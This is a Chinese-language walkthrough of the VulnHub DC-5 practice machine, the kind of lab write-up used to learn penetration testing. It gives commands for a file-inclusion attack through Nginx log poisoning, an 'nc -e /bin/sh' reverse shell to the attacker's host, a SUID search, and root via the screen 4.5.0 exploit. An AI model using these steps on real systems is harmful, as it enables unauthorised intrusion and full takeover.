DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip
kali:192.168.144.148
DC-5:192.168.144.153
nmap -T5 -p- -sV -sT -A 192.168.144.15
思路:
开放端口是80、36888
访问web页面:
网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;
……
1.访问http://192.168.144.153,点击contact页面
2.burpsuite抓取请求包
3.路径存在文件包含
1.利用文件包含写入一句话木马
2.利用文件包含使上传的文件以PHP格式执行
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行
file=/var/log/nginx/error.log&cmd=ls
3.nc 反弹shell
file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.144.148 4444
4.使用python生成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
1.查找以root权限运行的组件
find / -perm -4000 2>/dev/null
2.寻找screen 4.5.0相关漏洞
searchsploit screen 4.5.0
3.漏洞利用
将漏洞利用脚本复制到当前目录
:
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
将如下内容写入libhax.c中,然后gcc编译
:
vim libhax.c
gcc -fPIC -shared -ldl -o libhax.so libhax.c
将如下内容写入rootshell.c中,然后gcc编译
:
vim rootshell.c
gcc -o rootshell rootshell.c
将如下内容写入dc5.sh
:
vim dc5.sh
4.获取root权限
将刚刚生成的文件通过蚁剑上传到/tmp目录
:
cd /tmp
chmod +x dc5.sh
ls -l
./dc5.sh
cd /root